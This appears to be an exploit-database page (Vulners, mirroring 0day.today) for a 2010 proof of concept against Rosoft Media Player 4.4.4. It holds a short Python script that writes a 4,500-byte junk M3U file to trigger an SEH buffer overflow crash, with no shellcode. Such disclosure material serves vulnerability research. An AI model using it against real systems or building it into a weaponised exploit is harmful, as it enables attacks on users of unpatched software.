Lucene search
K

Rosoft media player 4.4.4 SEH buffer overflow POC

🗓️ 10 Aug 2010 00:00:00Reported by Abhishek LyallType 
zdt
 zdt
🔗 0day.today👁 23 Views

Rosoft media player 4.4.4 SEH buffer overflow POC, vulnerable application link, tested on XP SP2, author contact inf

Code
=================================================
Rosoft media player 4.4.4 SEH buffer overflow POC
=================================================

#rosoft media player 4.4.4 SEH buffer overflow POC
#vulnerble application link http://download.cnet.com/Rosoft-Media-Player/3000-2139_4-10044022.html
#tested on XP SP2
#author abhishek lyall - abhilyall[at]gmail[dot]com
#web - http://www.aslitsecurity.com/
#blog - http://www.aslitsecurity.blogspot.com/
#!/usr/bin/python
 
filename = "crash.m3u"
 
 
junk = "\x41" * 4500
 
textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()




#  0day.today [2018-01-24]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Aug 2010 00:00Current
7High risk
Vulners AI Score7
23